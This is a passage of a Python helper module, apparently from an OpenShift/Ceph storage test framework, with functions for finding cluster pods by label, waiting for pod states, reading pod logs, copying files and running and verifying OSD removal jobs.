if sample:
break
logger.info(f"Waiting for I/O to start inside {pod_obj.name}")
except TimeoutExpiredError:
logger.error(
f"Wait timeout: I/O failed to start inside {pod_obj.name}. "
"Collect file list."
)
parent_dir = os.path.join(TEST_FILE, os.pardir)
pod_obj.exec_cmd_on_pod(
command=f"ls -l {os.path.abspath(parent_dir)}", out_yaml_format=False
)
raise TimeoutExpiredError(f"I/O failed to start inside {pod_obj.name}")
return thread
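# A minimal sketch of how run_io_in_bg is typically consumed; the disruptive
# operation in the middle is a placeholder assumption:
#
#     io_thread = run_io_in_bg(pod_obj, expect_to_fail=True)
#     pod_obj.delete(wait=True)   # disruptive operation
#     io_thread.join()            # wait for the background I/O to terminate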
def get_admin_key_from_ceph_tools():
"""
Fetches admin key secret from ceph
Returns:
admin keyring encoded with base64 as a string
"""
tools_pod = get_ceph_tools_pod()
out = tools_pod.exec_ceph_cmd(ceph_cmd="ceph auth get-key client.admin")
base64_output = base64.b64encode(out["key"].encode()).decode()
return base64_output
def run_io_and_verify_mount_point(pod_obj, bs="10M", count="950"):
"""
Run I/O on mount point
Args:
pod_obj (Pod): The object of the pod
bs (str): Read and write up to bytes at a time
count (str): Copy only N input blocks
Returns:
used_percentage (str): Used percentage on mount point
"""
pod_obj.exec_cmd_on_pod(
command=f"dd if=/dev/urandom of=/var/lib/www/html/dd_a bs={bs} count={count}"
)
# Verify data is written to the mount point
mount_point = pod_obj.exec_cmd_on_pod(command="df -kh")
mount_point = mount_point.split()
used_percentage = mount_point[mount_point.index("/var/lib/www/html") - 1]
return used_percentage
def get_pods_having_label(label, namespace):
"""
Fetches pod resources with given label in given namespace
Args:
label (str): label which pods might have
namespace (str): Namespace in which to be looked up
Return:
list: of pods info
"""
ocp_pod = OCP(kind=constants.POD, namespace=namespace)
pods = ocp_pod.get(selector=label).get("items")
return pods
def get_deployments_having_label(label, namespace):
"""
Fetches deployment resources with given label in given namespace
Args:
label (str): label which deployments might have
namespace (str): Namespace in which to be looked up
Return:
list: deployment OCP instances
"""
ocp_deployment = OCP(kind=constants.DEPLOYMENT, namespace=namespace)
pods = ocp_deployment.get(selector=label).get("items")
return pods
def get_mds_pods(mds_label=constants.MDS_APP_LABEL, namespace=None):
"""
Fetches info about mds pods in the cluster
Args:
mds_label (str): label associated with mds pods
(default: defaults.MDS_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of mds pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
mdss = get_pods_having_label(mds_label, namespace)
mds_pods = [Pod(**mds) for mds in mdss]
return mds_pods
def get_mon_pods(mon_label=constants.MON_APP_LABEL, namespace=None):
"""
Fetches info about mon pods in the cluster
Args:
mon_label (str): label associated with mon pods
(default: defaults.MON_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of mon pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
mons = get_pods_having_label(mon_label, namespace)
mon_pods = [Pod(**mon) for mon in mons]
return mon_pods
def get_mgr_pods(mgr_label=constants.MGR_APP_LABEL, namespace=None):
"""
Fetches info about mgr pods in the cluster
Args:
mgr_label (str): label associated with mgr pods
(default: defaults.MGR_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of mgr pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
mgrs = get_pods_having_label(mgr_label, namespace)
mgr_pods = [Pod(**mgr) for mgr in mgrs]
return mgr_pods
def get_osd_pods(osd_label=constants.OSD_APP_LABEL, namespace=None):
"""
Fetches info about osd pods in the cluster
Args:
osd_label (str): label associated with osd pods
(default: defaults.OSD_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of osd pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
osds = get_pods_having_label(osd_label, namespace)
osd_pods = [Pod(**osd) for osd in osds]
return osd_pods
def get_osd_prepare_pods(
osd_prepare_label=constants.OSD_PREPARE_APP_LABEL,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
):
"""
Fetches info about osd prepare pods in the cluster
Args:
osd_prepare_label (str): label associated with osd prepare pods
(default: constants.OSD_PREPARE_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list: OSD prepare pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
osds = get_pods_having_label(osd_prepare_label, namespace)
osd_pods = [Pod(**osd) for osd in osds]
return osd_pods
def get_osd_deployments(osd_label=constants.OSD_APP_LABEL, namespace=None):
"""
Fetches info about osd deployments in the cluster
Args:
osd_label (str): label associated with osd deployments
(default: defaults.OSD_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list: OSD deployment OCS instances
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
osds = get_deployments_having_label(osd_label, namespace)
osd_deployments = [OCS(**osd) for osd in osds]
return osd_deployments
def get_pod_count(label, namespace=None):
namespace = namespace or config.ENV_DATA["cluster_namespace"]
pods = get_pods_having_label(label=label, namespace=namespace)
return len(pods)
def get_cephfsplugin_provisioner_pods(
cephfsplugin_provisioner_label=constants.CSI_CEPHFSPLUGIN_PROVISIONER_LABEL,
namespace=None,
):
"""
Fetches info about CSI Cephfs plugin provisioner pods in the cluster
Args:
cephfsplugin_provisioner_label (str): label associated with cephfs
provisioner pods
(default: defaults.CSI_CEPHFSPLUGIN_PROVISIONER_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : csi-cephfsplugin-provisioner Pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
pods = get_pods_having_label(cephfsplugin_provisioner_label, namespace)
fs_plugin_pods = [Pod(**pod) for pod in pods]
return fs_plugin_pods
def get_rbdfsplugin_provisioner_pods(
rbdplugin_provisioner_label=constants.CSI_RBDPLUGIN_PROVISIONER_LABEL,
namespace=None,
):
"""
Fetches info about CSI Cephfs plugin provisioner pods in the cluster
Args:
rbdplugin_provisioner_label (str): label associated with RBD
provisioner pods
(default: defaults.CSI_RBDPLUGIN_PROVISIONER_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : csi-rbdplugin-provisioner Pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
pods = get_pods_having_label(rbdplugin_provisioner_label, namespace)
ebd_plugin_pods = [Pod(**pod) for pod in pods]
return ebd_plugin_pods
def get_pod_obj(name, namespace=None):
"""
Returns the pod obj for the given pod
Args:
name (str): Name of the pod resource
namespace (str): Namespace of the pod
Returns:
obj : A pod object
"""
ocp_obj = OCP(api_version="v1", kind=constants.POD, namespace=namespace)
ocp_dict = ocp_obj.get(resource_name=name)
pod_obj = Pod(**ocp_dict)
return pod_obj
def get_pod_logs(
pod_name, container=None, namespace=defaults.ROOK_CLUSTER_NAMESPACE, previous=False
):
"""
Get logs from a given pod
Args:
pod_name (str): Name of the pod
container (str): Name of the container
namespace (str): Namespace of the pod
previous (bool): True if the previous pod's log is required, False otherwise
Returns:
str: Output of the 'oc logs <pod_name>' command
"""
pod = OCP(kind=constants.POD, namespace=namespace)
cmd = f"logs {pod_name}"
if container:
cmd += f" -c {container}"
if previous:
cmd += " --previous"
return pod.exec_oc_cmd(cmd, out_yaml_format=False)
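# A hedged usage sketch for get_pod_logs; the pod names are hypothetical
# examples, not values produced by this module:
#
#     logs = get_pod_logs("rook-ceph-operator-7d4c9b8f5d-abcde")
#     crash_logs = get_pod_logs(
#         "rook-ceph-osd-0-6c8d9f7b4-xyz12", container="osd", previous=True
#     )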
def get_pod_node(pod_obj):
"""
Get the node that the pod is running on
Args:
pod_obj (OCS): The pod object
Returns:
ocs_ci.ocs.ocp.OCP: The node object
"""
node_name = pod_obj.get().get("spec").get("nodeName")
return node.get_node_objs(node_names=node_name)[0]
def delete_pods(pod_objs, wait=True):
"""
Deletes list of the pod objects
Args:
pod_objs (list): List of the pod objects to be deleted
wait (bool): Determines if the delete command should wait for
completion
"""
for pod in pod_objs:
pod.delete(wait=wait)
def validate_pods_are_respinned_and_running_state(pod_objs_list):
"""
Verifies the list of the pods are respinned and in running state
Args:
pod_objs_list (list): List of the pods obj
Returns:
bool : True if the pods are respinned and running, False otherwise
Raises:
ResourceWrongStatusException: In case the resources haven't
reached the Running state
"""
for pod in pod_objs_list:
helpers.wait_for_resource_state(pod, constants.STATUS_RUNNING, timeout=180)
for pod in pod_objs_list:
pod_obj = pod.get()
start_time = pod_obj["status"]["startTime"]
ts = time.strptime(start_time, "%Y-%m-%dT%H:%M:%SZ")
ts = calendar.timegm(ts)
current_time_utc = time.time()
sec = current_time_utc - ts
if (sec / 3600) >= 1:
logger.error(
f"Pod {pod.name} was not respinned; its start time is {start_time}"
)
return False
return True
def verify_node_name(pod_obj, node_name):
"""
Verifies that the pod is running on a particular node
Args:
pod_obj (Pod): The pod object
node_name (str): The name of node to check
Returns:
bool: True if the pod is running on a particular node, False otherwise
"""
logger.info(
f"Checking whether the pod {pod_obj.name} is running on " f"node {node_name}"
)
actual_node = pod_obj.get().get("spec").get("nodeName")
if actual_node == node_name:
logger.info(
f"The pod {pod_obj.name} is running on the specified node " f"{actual_node}"
)
return True
else:
logger.info(
f"The pod {pod_obj.name} is not running on the specified node. "
f"Specified node: {node_name}, actual node: {actual_node}"
)
return False
def get_pvc_name(pod_obj):
"""
Function to get pvc_name from pod_obj
Args:
pod_obj (Pod): The pod object
Returns:
str: The pvc name of a given pod_obj
Raises:
UnavailableResourceException: If no pvc attached
"""
pvc = pod_obj.get().get("spec").get("volumes")[0].get("persistentVolumeClaim")
if not pvc:
raise UnavailableResourceException
return pvc.get("claimName")
def get_used_space_on_mount_point(pod_obj):
"""
Get the used space on a mount point
Args:
pod_obj (POD): The pod object
Returns:
int: Percentage represent the used space on the mount point
"""
# Get the used space on the mount point from 'df' output
mount_point = pod_obj.exec_cmd_on_pod(command="df -kh")
mount_point = mount_point.split()
used_percentage = mount_point[mount_point.index(constants.MOUNT_POINT) - 1]
return used_percentage
def get_plugin_pods(interface, namespace=None):
"""
Fetches info of csi-cephfsplugin pods or csi-rbdplugin pods
Args:
interface (str): Interface type. eg: CephBlockPool, CephFileSystem
namespace (str): Name of cluster namespace
Returns:
list : csi-cephfsplugin pod objects or csi-rbdplugin pod objects
"""
if interface == constants.CEPHFILESYSTEM:
plugin_label = constants.CSI_CEPHFSPLUGIN_LABEL
if interface == constants.CEPHBLOCKPOOL:
plugin_label = constants.CSI_RBDPLUGIN_LABEL
namespace = namespace or config.ENV_DATA["cluster_namespace"]
plugins_info = get_pods_having_label(plugin_label, namespace)
plugin_pods = [Pod(**plugin) for plugin in plugins_info]
return plugin_pods
def get_plugin_provisioner_leader(interface, namespace=None, leader_type="provisioner"):
"""
Get csi-cephfsplugin-provisioner or csi-rbdplugin-provisioner leader pod
Args:
interface (str): Interface type. eg: CephBlockPool, CephFileSystem
namespace (str): Name of cluster namespace
leader_type (str): Parameter to check the lease. eg: 'snapshotter' to
select external-snapshotter leader holder
Returns:
Pod: csi-cephfsplugin-provisioner or csi-rbdplugin-provisioner leader
pod
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
leader_types = {
"provisioner": namespace,
"snapshotter": f"external-snapshotter-leader-{namespace}",
"resizer": f"external-resizer-{namespace}",
"attacher": f"external-attacher-{namespace}",
}
if interface == constants.CEPHBLOCKPOOL:
lease_cmd = f"get leases {leader_types[leader_type]}-rbd-csi-ceph-com -o yaml"
elif interface == constants.CEPHFILESYSTEM:
lease_cmd = (
f"get leases {leader_types[leader_type]}-cephfs-csi-ceph-com " "-o yaml"
)
ocp_obj = ocp.OCP(kind=constants.POD, namespace=namespace)
lease = ocp_obj.exec_oc_cmd(command=lease_cmd)
leader = lease.get("spec").get("holderIdentity").strip()
assert leader, "Couldn't identify plugin provisioner leader pod."
logger.info(f"Plugin provisioner leader pod is {leader}")
ocp_obj._resource_name = leader
leader_pod = Pod(**ocp_obj.get())
return leader_pod
def get_operator_pods(operator_label=constants.OPERATOR_LABEL, namespace=None):
"""
Fetches info about rook-ceph-operator pods in the cluster
Args:
operator_label (str): Label associated with rook-ceph-operator pod
namespace (str): Namespace in which ceph cluster lives
Returns:
list : of rook-ceph-operator pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
operators = get_pods_having_label(operator_label, namespace)
operator_pods = [Pod(**operator) for operator in operators]
return operator_pods
def upload(pod_name, localpath, remotepath, namespace=None):
"""
Upload a file to pod
Args:
pod_name (str): Name of the pod
localpath (str): Local file to upload
remotepath (str): Target path on the pod
"""
namespace = namespace or constants.DEFAULT_NAMESPACE
cmd = (
f"oc -n {namespace} cp {os.path.expanduser(localpath)} {pod_name}:{remotepath}"
)
run_cmd(cmd)
def download_file_from_pod(pod_name, remotepath, localpath, namespace=None):
"""
Download a file from a pod
Args:
pod_name (str): Name of the pod
remotepath (str): Target path on the pod
localpath (str): Local file to upload
namespace (str): The namespace of the pod
"""
namespace = namespace or constants.DEFAULT_NAMESPACE
cmd = (
f"oc -n {namespace} cp {pod_name}:{remotepath} {os.path.expanduser(localpath)}"
)
run_cmd(cmd)
def wait_for_storage_pods(timeout=200):
"""
Check all OCS pods status, they should be in Running or Completed state
Args:
timeout (int): Number of seconds to wait for pods to get into correct
state
"""
all_pod_obj = get_all_pods(namespace=defaults.ROOK_CLUSTER_NAMESPACE)
# Ignoring pods with "app=rook-ceph-detect-version" app label
all_pod_obj = [
pod
for pod in all_pod_obj
if pod.get_labels()
and constants.ROOK_CEPH_DETECT_VERSION_LABEL not in pod.get_labels()
]
for pod_obj in all_pod_obj:
state = constants.STATUS_RUNNING
if any(i in pod_obj.name for i in ["-1-deploy", "ocs-deviceset"]):
state = constants.STATUS_COMPLETED
try:
helpers.wait_for_resource_state(
resource=pod_obj, state=state, timeout=timeout
)
except ResourceWrongStatusException:
# 'rook-ceph-crashcollector' on the failed node gets stuck in
# Pending state. BZ 1810014 tracks it.
# As a workaround, ignore the 'rook-ceph-crashcollector' pod
# health check and delete its deployment so that the pod
# disappears. This WA will be reverted once the BZ is fixed
if "rook-ceph-crashcollector" in pod_obj.name:
ocp_obj = ocp.OCP(namespace=defaults.ROOK_CLUSTER_NAMESPACE)
pod_name = pod_obj.name
deployment_name = "-".join(pod_name.split("-")[:-2])
command = f"delete deployment {deployment_name}"
ocp_obj.exec_oc_cmd(command=command)
logger.info(f"Deleted deployment for pod {pod_obj.name}")
else:
raise
def verify_pods_upgraded(old_images, selector, count=1, timeout=720):
"""
Verify that all pods do not have old image.
Args:
old_images (set): Set with old images.
selector (str): Selector (e.g. app=ocs-osd)
count (int): Number of resources for selector.
timeout (int): Timeout in seconds to wait for pods to be upgraded.
Raises:
TimeoutException: If the pods didn't get upgraded till the timeout.
"""
namespace = config.ENV_DATA["cluster_namespace"]
pod = OCP(
kind=constants.POD,
namespace=namespace,
)
info_message = (
f"Waiting for {count} pods with selector: {selector} to be running "
f"and upgraded."
)
logger.info(info_message)
start_time = time.time()
selector_label, selector_value = selector.split("=")
while True:
pod_count = 0
try:
pods = get_all_pods(namespace, [selector_value], selector_label)
pods_len = len(pods)
logger.info(f"Found {pods_len} pod(s) for selector: {selector}")
if pods_len != count:
logger.warning(
f"Number of found pods {pods_len} is not as expected: " f"{count}"
)
for pod in pods:
verify_images_upgraded(old_images, pod.get())
pod_count += 1
except CommandFailed as ex:
logger.warning(
f"Failed when getting pods with selector {selector}." f"Error: {ex}"
)
except NonUpgradedImagesFoundError as ex:
logger.warning(ex)
check_timeout_reached(start_time, timeout, info_message)
if pods_len != count:
logger.error(f"Found pods: {pods_len} but expected: {count}!")
elif pod_count == count:
return
def get_noobaa_pods(noobaa_label=constants.NOOBAA_APP_LABEL, namespace=None):
"""
Fetches info about noobaa pods in the cluster
Args:
noobaa_label (str): label associated with noobaa pods
(default: defaults.NOOBAA_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of noobaa pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
noobaas = get_pods_having_label(noobaa_label, namespace)
noobaa_pods = [Pod(**noobaa) for noobaa in noobaas]
return noobaa_pods
def wait_for_dc_app_pods_to_reach_running_state(
dc_pod_obj, timeout=120, exclude_state=None
):
"""
Wait for DC app pods to reach running state
Args:
dc_pod_obj (list): list of dc app pod objects
timeout (int): Timeout in seconds to wait for pods to be in Running
state.
exclude_state (str): A resource state to ignore
"""
for pod_obj in dc_pod_obj:
name = pod_obj.get_labels().get("name")
dpod_list = get_all_pods(selector_label=f"name={name}", wait=True)
for dpod in dpod_list:
if "-1-deploy" not in dpod.name and dpod.status != exclude_state:
helpers.wait_for_resource_state(
dpod, constants.STATUS_RUNNING, timeout=timeout
)
def delete_deploymentconfig_pods(pod_obj):
"""
Delete a DeploymentConfig pod and all the pods that are controlled by it
Args:
pod_obj (Pod): Pod object
"""
dc_ocp_obj = ocp.OCP(kind=constants.DEPLOYMENTCONFIG, namespace=pod_obj.namespace)
pod_data_list = dc_ocp_obj.get().get("items")
if pod_data_list:
for pod_data in pod_data_list:
if pod_obj.get_labels().get("name") == pod_data.get("metadata").get("name"):
dc_ocp_obj.delete(resource_name=pod_obj.get_labels().get("name"))
dc_ocp_obj.wait_for_delete(
resource_name=pod_obj.get_labels().get("name")
)
def wait_for_new_osd_pods_to_come_up(number_of_osd_pods_before):
"""
Wait for the new osd pods to start coming up
Args:
number_of_osd_pods_before (int): The number of osd pods before the new osd pods were added
"""
status_options = ["Init:1/4", "Init:2/4", "Init:3/4", "PodInitializing", "Running"]
try:
for osd_pods in TimeoutSampler(timeout=180, sleep=3, func=get_osd_pods):
# Check if the new osd pods has started to come up
new_osd_pods = osd_pods[number_of_osd_pods_before:]
new_osd_pods_come_up = [
pod.status() in status_options for pod in new_osd_pods
]
if any(new_osd_pods_come_up):
logging.info("One or more of the new osd pods has started to come up")
break
except TimeoutExpiredError:
logging.warning("None of the new osd pods reached the desired status")
def get_pod_restarts_count(namespace=defaults.ROOK_CLUSTER_NAMESPACE):
"""
Gets the dictionary of pod and its restart count for all the pods in a given namespace
Args:
namespace (str): Name of the namespace (default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
dict: dictionary of pod name and its corresponding restart count
"""
list_of_pods = get_all_pods(namespace)
restart_dict = {}
ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
for p in list_of_pods:
# we don't want to compare osd-prepare and canary pods as they get created freshly when an osd needs to be added.
if (
"rook-ceph-osd-prepare" not in p.name
and "rook-ceph-drain-canary" not in p.name
):
restart_dict[p.name] = int(ocp_pod_obj.get_resource(p.name, "RESTARTS"))
logging.info(f"get_pod_restarts_count: restarts dict = {restart_dict}")
return restart_dict
def check_pods_in_running_state(
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
pod_names=None,
raise_pod_not_found_error=False,
):
"""
checks whether all the pods in a given namespace are in Running state or not
Args:
namespace (str): Name of cluster namespace(default: defaults.ROOK_CLUSTER_NAMESPACE)
pod_names (list): List of the pod names to check.
If not provided, it will check all the pods in the given namespace
raise_pod_not_found_error (bool): If True, it raises an exception, if one of the pods
in the pod names are not found. If False, it ignores the case of pod not found and
returns the pod objects of the rest of the pod names. The default value is False
Returns:
Boolean: True, if all pods in Running state. False, otherwise
"""
ret_val = True
if pod_names:
list_of_pods = get_pod_objs(pod_names, raise_pod_not_found_error)
else:
list_of_pods = get_all_pods(namespace)
ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
for p in list_of_pods:
# Skip osd-prepare, drain-canary and debug pods, as they get created
# freshly (e.g. when an osd needs to be added) and are not expected to
# stay in Running state
if (
"rook-ceph-osd-prepare" not in p.name
and "rook-ceph-drain-canary" not in p.name
and "debug" not in p.name
):
status = ocp_pod_obj.get_resource(p.name, "STATUS")
if status != "Running":
logging.error(
f"The pod {p.name} is in {status} state. Expected = Running"
)
ret_val = False
return ret_val
def get_running_state_pods(namespace=defaults.ROOK_CLUSTER_NAMESPACE):
"""
Gets the pods that are in Running state in a given namespace.
Returns:
List: all the pod objects that are in running state only
"""
list_of_pods = get_all_pods(namespace)
ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
running_pods_object = list()
for pod in list_of_pods:
status = ocp_pod_obj.get_resource(pod.name, "STATUS")
if "Running" in status:
running_pods_object.append(pod)
return running_pods_object
def wait_for_pods_to_be_running(
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
pod_names=None,
raise_pod_not_found_error=False,
timeout=200,
sleep=10,
):
"""
Wait for all the pods in a specific namespace to be running.
Args:
namespace (str): the namespace of the pods
pod_names (list): List of the pod names to check.
If not provided, it will check all the pods in the given namespace
raise_pod_not_found_error (bool): If True, it raises an exception(in the function
'check_pods_in_running_state'), if one of the pods in the pod names are not found.
If False, it ignores the case of pod not found and returns the pod objects of
the rest of the pod names. The default value is False
timeout (int): time to wait for pods to be running
sleep (int): Time in seconds to sleep between attempts
Returns:
bool: True, if all pods in Running state. False, otherwise
"""
try:
for pods_running in TimeoutSampler(
timeout=timeout,
sleep=sleep,
func=check_pods_in_running_state,
namespace=namespace,
pod_names=pod_names,
raise_pod_not_found_error=raise_pod_not_found_error,
):
# Check if all the pods in running state
if pods_running:
logging.info("All the pods reached status running!")
return True
except TimeoutExpiredError:
logging.warning(
f"Not all the pods reached status running " f"after {timeout} seconds"
)
return False
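# A minimal sketch combining the status helpers above; the pod names and
# timeout are illustrative assumptions:
#
#     assert wait_for_pods_to_be_running(timeout=300), (
#         "Not all pods reached Running state"
#     )
#     # or watch a specific subset (truncated names shown for illustration):
#     # wait_for_pods_to_be_running(pod_names=["rook-ceph-osd-0-...", "rook-ceph-osd-1-..."])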
def list_of_nodes_running_pods(selector, namespace=defaults.ROOK_CLUSTER_NAMESPACE):
"""
The function returns the list of nodes for the given selector
Args:
selector (str): The resource selector to search with
namespace (str): Namespace to look up the pods in (default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list: a list of nodes that runs the given selector pods
"""
pod_obj_list = get_all_pods(namespace=namespace, selector=[selector])
pods_running_nodes = [get_pod_node(pod) for pod in pod_obj_list]
logger.info(f"{selector} running on nodes {pods_running_nodes}")
return list(set(pods_running_nodes))
def get_osd_removal_pod_name(osd_id, timeout=60):
"""
Get the osd removal pod name
Args:
osd_id (int): The osd's id to get the osd removal pod name
timeout (int): The time to wait for getting the osd removal pod name
Returns:
str: The osd removal pod name
"""
ocs_version = config.ENV_DATA["ocs_version"]
if Version.coerce(ocs_version) == Version.coerce("4.7"):
pattern = "ocs-osd-removal-job"
elif Version.coerce(ocs_version) == Version.coerce("4.8"):
pattern = "ocs-osd-removal-"
else:
pattern = f"ocs-osd-removal-{osd_id}"
try:
for osd_removal_pod_names in TimeoutSampler(
timeout=timeout,
sleep=5,
func=get_pod_name_by_pattern,
pattern=pattern,
):
if osd_removal_pod_names:
osd_removal_pod_name = osd_removal_pod_names[0]
logging.info(f"Found pod {osd_removal_pod_name}")
return osd_removal_pod_name
except TimeoutExpiredError:
logger.warning(f"Failed to get pod by the pattern {pattern}")
return None
def check_toleration_on_pods(toleration_key=constants.TOLERATION_KEY):
"""
Function to check toleration on pods
Args:
toleration_key (str): The toleration key to check
"""
pod_objs = get_all_pods(
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
selector=[constants.TOOL_APP_LABEL],
exclude_selector=True,
)
flag = False
for pod_obj in pod_objs:
resource_name = pod_obj.name
tolerations = pod_obj.get().get("spec").get("tolerations")
for key in tolerations:
if key["key"] == toleration_key:
flag = True
if flag:
logger.info(f"The Toleration {toleration_key} exists on {resource_name}")
else:
logger.error(
f"The pod {resource_name} does not have toleration {toleration_key}"
)
def run_osd_removal_job(osd_ids=None):
"""
Run the ocs-osd-removal job
Args:
osd_ids (list): The osd IDs.
Returns:
ocs_ci.ocs.resources.ocs.OCS: The ocs-osd-removal job object
"""
osd_ids_str = ",".join(map(str, osd_ids))
ocp_version = get_ocp_version()
if Version.coerce(ocp_version) >= Version.coerce("4.6"):
cmd = f"process ocs-osd-removal -p FAILED_OSD_IDS={osd_ids_str} -o yaml"
else:
cmd = f"process ocs-osd-removal -p FAILED_OSD_ID={osd_ids_str} -o yaml"
logger.info(f"Executing OSD removal job on OSD ids: {osd_ids_str}")
ocp_obj = ocp.OCP(namespace=defaults.ROOK_CLUSTER_NAMESPACE)
osd_removal_job_yaml = ocp_obj.exec_oc_cmd(cmd)
# Add the namespace param, so that the ocs-osd-removal job will be created in the correct namespace
osd_removal_job_yaml["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
osd_removal_job = OCS(**osd_removal_job_yaml)
osd_removal_job.create(do_reload=False)
return osd_removal_job
def verify_osd_removal_job_completed_successfully(osd_id):
"""
Verify that the ocs-osd-removal job completed successfully
Args:
osd_id (str): The osd id
Returns:
bool: True, if the ocs-osd-removal job completed successfully. False, otherwise
"""
logger.info("Getting the ocs-osd-removal pod name")
osd_removal_pod_name = get_osd_removal_pod_name(osd_id)
osd_removal_pod_obj = get_pod_obj(
osd_removal_pod_name, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
timeout = 300
try:
is_completed = osd_removal_pod_obj.ocp.wait_for_resource(
condition=constants.STATUS_COMPLETED,
resource_name=osd_removal_pod_name,
sleep=20,
timeout=timeout,
)
# Don't fail the test yet if the ocs-osd-removal pod job is not completed
except TimeoutExpiredError:
is_completed = False
ocp_pod_obj = OCP(kind=constants.POD, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
osd_removal_pod_status = ocp_pod_obj.get_resource_status(osd_removal_pod_name)
# Check if 'osd_removal_pod' is in status 'completed'
if not is_completed and osd_removal_pod_status != constants.STATUS_COMPLETED:
if osd_removal_pod_status != constants.STATUS_RUNNING:
logger.info(
f"ocs-osd-removal pod job did not reach status '{constants.STATUS_COMPLETED}' "
f"or '{constants.STATUS_RUNNING}' after {timeout} seconds"
)
return False
else:
logger.info(
f"ocs-osd-removal pod job reached status '{constants.STATUS_RUNNING}',"
f" but we were waiting for status '{constants.STATUS_COMPLETED}' "
)
new_timeout = 900
logger.info(
f"Wait more {new_timeout} seconds for ocs-osd-removal pod job to be completed"
)
is_completed = osd_removal_pod_obj.ocp.wait_for_resource(
condition=constants.STATUS_COMPLETED,
resource_name=osd_removal_pod_name,
sleep=30,
timeout=new_timeout,
)
if not is_completed:
logger.info(
f"ocs-osd-removal pod job did not complete after {new_timeout} seconds"
)
return False
# Verify OSD removal from the ocs-osd-removal pod logs
logger.info(f"Verifying removal of OSD from {osd_removal_pod_name} pod logs")
logs = get_pod_logs(osd_removal_pod_name)
pattern = f"purged osd.{osd_id}"
if not re.search(pattern, logs):
logger.warning(
f"Didn't find the removal of OSD from {osd_removal_pod_name} pod logs"
)
return False
return True
def delete_osd_removal_job(osd_id):
"""
Delete the ocs-osd-removal job.
Args:
osd_id (str): The osd id
Returns:
bool: True, if the ocs-osd-removal job deleted successfully. False, otherwise
"""
ocs_version = config.ENV_DATA["ocs_version"]
if Version.coerce(ocs_version) >= Version.coerce("4.7"):
job_name = "ocs-osd-removal-job"
else:
job_name = f"ocs-osd-removal-{osd_id}"
osd_removal_job = get_job_obj(job_name, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
osd_removal_job.delete()
try:
osd_removal_job.ocp.wait_for_delete(resource_name=job_name)
except TimeoutError:
logger.warning(f"{job_name} job did not get deleted successfully")
return False
return True
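# A hedged sketch of the full OSD removal flow built from the helpers above;
# the osd id is an illustrative assumption:
#
#     failed_osd_id = "2"
#     run_osd_removal_job(osd_ids=[failed_osd_id])
#     assert verify_osd_removal_job_completed_successfully(failed_osd_id)
#     delete_osd_removal_job(failed_osd_id)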
def get_deployment_name(pod_name):
"""
Get the deployment of the pod.
Args:
pod_name (str): The pod's name.
Returns:
str: The deployment name of the given pod
"""
return "-".join(pod_name.split("-")[:-2])
def get_osd_pod_id(osd_pod):
"""
Get the osd pod id
Args:
osd_pod (ocs_ci.ocs.resources.pod.Pod): The osd pod object
Returns:
str: The osd pod id
"""
return osd_pod.get().get("metadata").get("labels").get("ceph-osd-id")
def get_pods_in_statuses(status_options, namespace=defaults.ROOK_CLUSTER_NAMESPACE):
"""
Get all the pods in specific statuses
Args:
status_options (list): The list of the status options.
namespace (str): Name of cluster namespace(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list: All the pods that their status in the 'status_options' list.
"""
pods = get_all_pods(namespace)
ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
pods_in_status_options = list()
for p in pods:
pod_status = ocp_pod_obj.get_resource_status(p.name)
if pod_status in status_options:
pods_in_status_options.append(p)
return pods_in_status_options
def get_pod_ceph_daemon_type(pod_obj):
"""
Get the ceph daemon type of the pod object
Args:
pod_obj (Pod): the pod object
Returns:
str: The pod's ceph daemon type
"""
return pod_obj.get_labels().get("ceph_daemon_type")
def check_pods_after_node_replacement():
"""
Check the pods status after the node replacement process.
Returns:
bool: True if all the pods are running after a specific time. False otherwise.
"""
are_pods_running = wait_for_pods_to_be_running(timeout=180)
if are_pods_running:
return True
not_ready_statuses = [
constants.STATUS_ERROR,
constants.STATUS_PENDING,
constants.STATUS_CLBO,
constants.STATUS_TERMINATING,
]
pods_not_ready = get_pods_in_statuses(status_options=not_ready_statuses)
if len(pods_not_ready) == 0:
logger.info("All the pods are running")
return True
